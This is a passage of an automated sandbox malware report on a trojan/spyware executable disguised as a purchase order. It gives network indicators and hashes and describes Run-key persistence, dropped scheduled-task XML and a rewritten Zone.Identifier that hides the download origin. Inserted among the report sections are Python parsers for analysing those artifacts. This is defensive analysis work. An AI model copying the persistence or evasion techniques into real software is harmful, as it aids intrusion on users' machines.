                                                http://www.jiyu-kobo.co.jp/hPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248653593.0000000005E6B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.248792641.0000000005E6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.comalsPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.comalicPurchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253513922.0000000005E67000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.253746294.0000000005E68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
IP              Domain                    Country        ASN     ASN Name                  Malicious
162.222.225.16  unknown                   United States  394695  PUBLIC-DOMAIN-REGISTRYUS  false
208.91.198.38   us2.smtp.mailhostbox.com  United States  394695  PUBLIC-DOMAIN-REGISTRYUS  false
                                                IP
                                                192.168.2.1
                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                Analysis ID:626538
Start date and time: 2022-05-14 11:35:30 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 13m 22s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:Purchase order 450080088 proj. Allt Charnan.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 38
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.adwa.spyw.evad.winEXE@23/16@12/3
                                                EGA Information:
                                                • Successful, ratio: 83.3%
                                                HDC Information:
                                                • Successful, ratio: 1.6% (good quality ratio 1.1%)
                                                • Quality average: 55.9%
                                                • Quality standard deviation: 43%
                                                HCA Information:
                                                • Successful, ratio: 96%
                                                • Number of executed functions: 173
                                                • Number of non-executed functions: 6
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Execution Graph export aborted for target Purchase order 450080088 proj. Allt Charnan.exe, PID 7112 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
Time      Type             Description
11:36:39  API Interceptor  652x Sleep call for process: Purchase order 450080088 proj. Allt Charnan.exe modified
11:36:44  API Interceptor  32x Sleep call for process: powershell.exe modified
11:36:57  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run jVULYR C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
11:37:05  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run jVULYR C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
11:37:09  API Interceptor  430x Sleep call for process: jVULYR.exe modified
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):1308
                                                Entropy (8bit):5.345811588615766
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                Malicious:true
                                                Reputation:unknown
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                Process:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1308
                                                Entropy (8bit):5.345811588615766
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):22276
                                                Entropy (8bit):5.602944370591129
                                                Encrypted:false
                                                SSDEEP:384:stCDL+0wgSEn7J+0tv+CS0n0jultI+b7Y9gtSJ3xeT1MaXZlbAV787WdO5ZBDI++:F7J+qT0Clth7tc8C+fwIvVU
                                                MD5:ECC0AC3C384575596E261D66E00E67E0
                                                SHA1:6CA2B70139DD3E5167E7FFCC68BD756855235F91
                                                SHA-256:75B4F86BD8FD5A949C7EA84AA61BA8177C4E71A458F2757E8AD5F58EEB15653B
                                                SHA-512:DE5C577BA626CB916866FDA491F1627F1F79204016579902DF3A4EA7F843ADC5A85A2D4AF33EC4B9C4349A389057CFD555558E719FDB41FD07231E4416CDAA05
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:@...e...........y.......h...o.e.b.....X...J..........@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:1
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:1
                                                Process:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                File Type:XML 1.0 document, ASCII text
                                                Category:dropped
                                                Size (bytes):1595
                                                Entropy (8bit):5.149898447044465
                                                Encrypted:false
                                                SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtOtxvn:cge4MYrFdOFzOzN33ODOiDdKrsuT2v
                                                MD5:DD6C0EEF606D484E89572F935B1B7EED
                                                SHA1:D71106AE2D8342235032067DB310DCEA3D81BD7A
                                                SHA-256:C11F85855EE643320520D3E1B797B8CE460F8C019C37EDCC97E3EBCBDD931AFC
                                                SHA-512:1410D7AEA3AE9A66057F05B32B04E1F9A916F13E5CCD2A714A455900370D5F8A75DE4846786FDE270CCCDDB869197596F40B6B9ECB8F1E2497589822382EA46B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:XML 1.0 document, ASCII text
                                                Category:dropped
                                                Size (bytes):1595
                                                Entropy (8bit):5.149898447044465
                                                Encrypted:false
                                                SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtOtxvn:cge4MYrFdOFzOzN33ODOiDdKrsuT2v
                                                MD5:DD6C0EEF606D484E89572F935B1B7EED
                                                SHA1:D71106AE2D8342235032067DB310DCEA3D81BD7A
                                                SHA-256:C11F85855EE643320520D3E1B797B8CE460F8C019C37EDCC97E3EBCBDD931AFC
                                                SHA-512:1410D7AEA3AE9A66057F05B32B04E1F9A916F13E5CCD2A714A455900370D5F8A75DE4846786FDE270CCCDDB869197596F40B6B9ECB8F1E2497589822382EA46B
                                                Malicious:true
                                                Reputation:unknown
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                                Process:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                File Type:XML 1.0 document, ASCII text
                                                Category:dropped
                                                Size (bytes):1595
                                                Entropy (8bit):5.149898447044465
                                                Encrypted:false
                                                SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtOtxvn:cge4MYrFdOFzOzN33ODOiDdKrsuT2v
                                                MD5:DD6C0EEF606D484E89572F935B1B7EED
                                                SHA1:D71106AE2D8342235032067DB310DCEA3D81BD7A
                                                SHA-256:C11F85855EE643320520D3E1B797B8CE460F8C019C37EDCC97E3EBCBDD931AFC
                                                SHA-512:1410D7AEA3AE9A66057F05B32B04E1F9A916F13E5CCD2A714A455900370D5F8A75DE4846786FDE270CCCDDB869197596F40B6B9ECB8F1E2497589822382EA46B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
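Added example, not part of the Joe Sandbox report and not code from the sample: a parser for the dropped task XML above that pulls out the fields an analyst checks for persistence (enabled triggers, principal and run level, instance policy, registration date) and reports what is missing. It uses a constructed sample that copies the part of the XML visible in the three previews and closes the open elements where the preview is truncated; no Actions element is visible in the report, so none is added and the code reports its absence. The file declares encoding="UTF-16" while its File Type line says ASCII; expat rejects that combination when fed the raw bytes, so the loader decodes by what the bytes actually are and drops the declaration first. The analysis date passed to the check is the transcript start date shown elsewhere in this report.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: the portion of the dropped task XML visible in the report's
# preview, with the open elements closed where the preview cuts off. The real file
# declares encoding="UTF-16" but is plain ASCII. No <Actions> element is visible in
# the report, so none is included.
SAMPLE_TASK_XML = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>computer\\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>computer\\user</UserId>
    </LogonTrigger>
    <RegistrationTrigger>
      <Enabled>false</Enabled>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>computer\\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
</Task>
"""

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}


def load_task_xml(raw: bytes) -> ET.Element:
    """Parse Task Scheduler XML whose declaration may not match its real encoding."""
    # Expat rejects ASCII bytes that declare UTF-16, so decode by what the bytes
    # actually are (BOM => UTF-16, otherwise UTF-8/ASCII) and drop the declaration.
    text = raw.decode("utf-16") if raw[:2] in (b"\xff\xfe", b"\xfe\xff") else raw.decode("utf-8")
    text = re.sub(r"^\s*<\?xml[^>]*\?>", "", text, count=1)
    return ET.fromstring(text)


def summarize_task(raw: bytes) -> dict:
    """Collect the fields an analyst checks when malware drops a task definition."""
    root = load_task_xml(raw)

    def text_of(path):
        return root.findtext(path, default=None, namespaces=NS)

    def is_enabled(trigger):
        # <Enabled> defaults to true when the element is absent.
        return trigger.findtext("t:Enabled", default="true", namespaces=NS) == "true"

    def local(el):
        return el.tag.split("}", 1)[1]

    return {
        "registered": text_of("t:RegistrationInfo/t:Date"),
        "author": text_of("t:RegistrationInfo/t:Author"),
        "enabled_triggers": [local(t) for t in root.findall("t:Triggers/*", NS) if is_enabled(t)],
        "run_as": text_of("t:Principals/t:Principal/t:UserId"),
        "logon_type": text_of("t:Principals/t:Principal/t:LogonType"),
        "run_level": text_of("t:Principals/t:Principal/t:RunLevel"),
        "multiple_instances": text_of("t:Settings/t:MultipleInstancesPolicy"),
        # Empty when the <Actions> element is absent, as in the constructed sample.
        "actions": [(local(a), a.findtext("t:Command", default=None, namespaces=NS))
                    for a in root.findall("t:Actions/*", NS)],
    }


def persistence_notes(summary: dict, analysis_date: str) -> list:
    """Turn the summary into the observations that belong in a report."""
    notes = []
    if "LogonTrigger" in summary["enabled_triggers"]:
        notes.append("starts at every logon of %s" % summary["run_as"])
    if summary["run_level"] == "LeastPrivilege":
        notes.append("LeastPrivilege: a standard user can register it without elevation "
                     "and it runs with that user's normal token")
    if summary["multiple_instances"] == "StopExisting":
        notes.append("StopExisting: a new logon replaces the running instance instead of failing")
    if summary["registered"] and summary["registered"][:10] < analysis_date[:10]:
        notes.append("registration date %s predates the analysis run: the XML is a template "
                     "carried in the sample" % summary["registered"][:10])
    if not summary["actions"]:
        notes.append("no <Actions> element in the parsed data")
    return notes
```

On a real dropped file, pass `open(path, "rb").read()` to `summarize_task`; the same loader handles a genuine UTF-16 task exported by schtasks, which does carry a BOM.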
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):677888
                                                Entropy (8bit):7.7510737607081515
                                                Encrypted:false
                                                SSDEEP:12288:TuXha3wv5LRtvlWwlCBYB6xLKWvV+smSe2r5uLd/zUoylGey4:aY05vlRlCBOMLKZSes8d/zlyN
                                                MD5:152EF22896BF39197D210D40171E898A
                                                SHA1:BDD88E03D9131D7F35E0BFADBED02010D231A1BD
                                                SHA-256:5A3834895F08AFF701A029275074D4AB47AFF4951D6F75E8393B0A97CB8F6031
                                                SHA-512:B4648E8C09C4958D80C9F08801D9BD9E3E2651DD194A71DB30D9BA1C84EE448823F97C1550FBD476863046398CAE26E533AA504E7BB297DD53287F52A0D4C928
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 62%
                                                Reputation:unknown
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.~b..............0..P...........n... ........@.. ....................................@..................................n..K...................................*n............................................... ............... ..H............text....N... ...P.................. ..`.rsrc................R..............@..@.reloc...............V..............@..B.................n......H......................h5...6...........................................~....(q...8.....(....8......~....(q...8.....*...0..m.......8".......E........8......*.~......8<....~.........8 ....s......... ....(....9....&8......9....8....8....8........0..........8........E....Q...........&.......w...........+...]...................8L....~.....o..... ....~....(u...o....8.....~.....o..... ....~....(u...o....8.....~.....s....o....8.....~.....o..... ...~....(u...o....8H...~.....s....o.
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Reputation:unknown
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                Process:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                Category:dropped
                                                Size (bytes):20480
                                                Entropy (8bit):0.6970840431455908
                                                Encrypted:false
                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):677888
                                                Entropy (8bit):7.7510737607081515
                                                Encrypted:false
                                                SSDEEP:12288:TuXha3wv5LRtvlWwlCBYB6xLKWvV+smSe2r5uLd/zUoylGey4:aY05vlRlCBOMLKZSes8d/zlyN
                                                MD5:152EF22896BF39197D210D40171E898A
                                                SHA1:BDD88E03D9131D7F35E0BFADBED02010D231A1BD
                                                SHA-256:5A3834895F08AFF701A029275074D4AB47AFF4951D6F75E8393B0A97CB8F6031
                                                SHA-512:B4648E8C09C4958D80C9F08801D9BD9E3E2651DD194A71DB30D9BA1C84EE448823F97C1550FBD476863046398CAE26E533AA504E7BB297DD53287F52A0D4C928
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 62%
                                                Reputation:unknown
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.~b..............0..P...........n... ........@.. ....................................@..................................n..K...................................*n............................................... ............... ..H............text....N... ...P.................. ..`.rsrc................R..............@..@.reloc...............V..............@..B.................n......H......................h5...6...........................................~....(q...8.....(....8......~....(q...8.....*...0..m.......8".......E........8......*.~......8<....~.........8 ....s......... ....(....9....&8......9....8....8....8........0..........8........E....Q...........&.......w...........+...]...................8L....~.....o..... ....~....(u...o....8.....~.....o..... ....~....(u...o....8.....~.....s....o....8.....~.....o..... ...~....(u...o....8H...~.....s....o.
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Reputation:unknown
                                                Preview:[ZoneTransfer]....ZoneId=0
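Added example, not from the report or the sample, covering the two 26-byte Zone.Identifier streams listed above: a parser for the alternate data stream and a check of whether the file still carries a Mark of the Web. Both inputs are constructed; the first is laid out to match the preview and the stated size (`[ZoneTransfer]`, two CRLFs, `ZoneId=0`, no trailing newline), the second uses made-up URLs to show what a browser download normally leaves behind.

```python
# Constructed inputs. The first is laid out to match the 26-byte stream in the
# report ("[ZoneTransfer]", CRLF, CRLF, "ZoneId=0", no trailing newline); the
# second is what a browser download normally writes, with made-up URLs.
ADS_FROM_SAMPLE = b"[ZoneTransfer]\r\n\r\nZoneId=0"
ADS_FROM_BROWSER = (b"[ZoneTransfer]\r\nZoneId=3\r\n"
                    b"ReferrerUrl=https://example.test/\r\n"
                    b"HostUrl=https://example.test/download.exe\r\n")

# URLZONE values as Windows records them in Zone.Identifier.
ZONE_NAMES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites",
              3: "Internet", 4: "Restricted Sites"}


def parse_zone_identifier(raw: bytes) -> dict:
    """Read the INI-style stream, tolerating blank lines, CR-only or LF-only
    line endings, and a missing final newline."""
    fields, section = {}, None
    for line in raw.decode("utf-8", "replace").replace("\r", "\n").split("\n"):
        line = line.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section == "ZoneTransfer" and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip()] = value.strip()
    return fields


def assess_motw(raw: bytes) -> dict:
    """Say whether the stream still carries a Mark of the Web and whether it
    records where the file came from."""
    fields = parse_zone_identifier(raw)
    zone = int(fields["ZoneId"]) if fields.get("ZoneId", "").isdigit() else None
    return {
        "zone_id": zone,
        "zone_name": ZONE_NAMES.get(zone, "unknown"),
        # SmartScreen and the "this file came from another computer" handling apply
        # to zones 3 and 4 only; a rewritten ZoneId=0 makes the file look local.
        "motw_present": zone is not None and zone >= 3,
        "has_source_urls": "HostUrl" in fields or "ReferrerUrl" in fields,
    }
```

On a live host the stream is read with `Get-Content -Path <file> -Stream Zone.Identifier`; a ZoneId of 0 written by a process that is not a browser or mail client, with no HostUrl, is the pattern the report's "Hides that the sample has been downloaded from the Internet" signature describes.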
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                Category:modified
                                                Size (bytes):20480
                                                Entropy (8bit):0.6970840431455908
                                                Encrypted:false
